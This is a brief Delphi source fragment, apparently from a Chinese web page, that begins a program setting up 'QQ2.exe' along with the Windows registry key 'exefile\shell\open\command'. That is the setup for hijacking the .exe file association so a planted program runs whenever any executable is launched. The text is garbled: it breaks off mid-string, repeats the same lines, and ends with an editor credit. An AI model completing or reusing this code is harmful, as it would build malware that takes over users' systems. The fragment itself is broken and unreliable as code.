program internet;
uses
windows,messages,sysutils,shellapi;
{$R *.res}
const
exename:pchar=’QQ2.exe’;
ExeFilePath=’exefile\shell\open\command’;
ExeFileValue=’
program internet;
uses
windows,messages,sysutils,shellapi;
{$R *.res}
const
exename:pchar=’QQ2.exe’;
ExeFilePath=’exefile\shell\open\command’;
ExeFileValue=’
责任编辑 webmaster